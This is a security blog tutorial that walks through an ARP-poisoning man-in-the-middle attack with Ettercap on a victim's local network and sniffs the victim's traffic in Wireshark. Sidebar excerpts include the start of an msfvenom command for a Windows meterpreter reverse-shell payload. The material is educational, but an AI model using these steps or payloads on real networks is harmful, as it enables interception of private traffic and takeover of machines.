Performing Man-in-the-middle(MITM) attack using Ettercap and analyzing the packet using Wireshark

 First, we have to connect Kali-Linux in the same network in which victim was connected.

Note :- "we have to connect kali with the same network of victim."

 

   Step-1 :- Start Ettercap (GUI version) on Kali-Linux as shown below.



Step-2 : - Turn on "Sniffing at startup" option, And select your interface from below

                     option.



   Then Click on start as shown below.



   Wait until the message "started unified sniffing" you get as shown below.



   Make sure that your victim is in the network, to check that we have to scan the whole

   network. (Follow the below screenshots)

 



Note :- "if it is doesn't showing anything then click on "scan for hosts" as shown below."

 



   All connected devices of your network will be displayed as shown below.

 



  

   Note:- you want to know your victim's IP, to identify your victim's IP network you

      can perform OS Detection Scan through NMAP on the following IP's."

 

 

 

   I performed map scans and get my victim IP is 192.168.0.104 and the router IP

   was 192,168.0.1, Now I'm adding my victim to the Target-1 and router to the

   Target-2 to perform ARP poisoning attack.

 



 



   Step-3 :- After adding both the targets, Start the ARP poisoning as shown below.



 

   Step-4 :- After pressing OK, the attack was started.

 

   Now you can monitor all the packets between your victim and router.

 

   Step-5 :- To watch the Packets you need to open Wireshark on Kali. After

           opening Wireshark click on your network interface as shown below.

 

   (My interface is eth0, so I'm clicking on eth0).



   Step-6 :- You can see there are many packets shown here. we want packets of our

   victim only so we need to filter the list. to filter paste this on your Wireshark. (Use your

   victim's IP instead of this)

 

 

  ip.addr == 192.168.0.104

 



 

  Step-7 :- Now we will open facebook.com on our victim device and check the packets

                    are displayed here or not.

 

 

 



 

   Packet displays that victim is requesting for facebook.com

 



   We have Successfully Sniffed the packets and also performed the ARP Poisoning

   Attack.

THANK YOU

CHITT BHAVSAR..

Comments

Post a Comment

Popular posts from this blog

Exploiting Windows 10 using Kali Linux

Image
 Hello everyone, this blog is related to exploiting windows system(win-10) using Kali Linux. So, basically we need two operating systems, First one is kali(attacker) and second one is Windows(victim). This Practical works when both of the machines are in same network. So. I have installed Kali-linux and windows-10 in Virtualbox. And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network, This also works if you have host machine kali and on other side you have windows-10(PC) with you. You can also install kali on Virtualbox and set it to NAT network(Bridge is recommended). For surety u can ping the windows 10 machine from Kali to check that the machines are on same network or not. Practical Starts Here -------> 1. go to kali terminal and type the following command.  type your kali ip instead of 10.0.2.4 msfvenom -p windows/x64/meterpreter/reverse_...
Read more

Configuring SNORT on Network Using Kali Linux

Image
 What is SNORT?   --> Snort is the foremost Open Source Intrusion Prevention System (IPS) in the world. Snort IPS uses a series of rules that help define malicious network activity and uses those rules to find packets that match against them and generates alerts for users.   How it is shown in this blog ?   --> Here we will configure SNORT our local Home network.           Here in this blog I will show you how you can get alerts in kali terminal if some user on your local home network(Wifi) is using Instagram, Facebook and Youtube. We will configure some set of custom rules for this three websites. SNORT itself comes with some sort of Pre-defined rules for Securing our network from Scanning and exploiting.   Reuirements :- 1. Kali Linux (which is connected to the your network which you want to monitor) 2.Router    I have Installed Kali Linux on Virtual box.   So lets Start ----------->   Step 1:- Download and...
Read more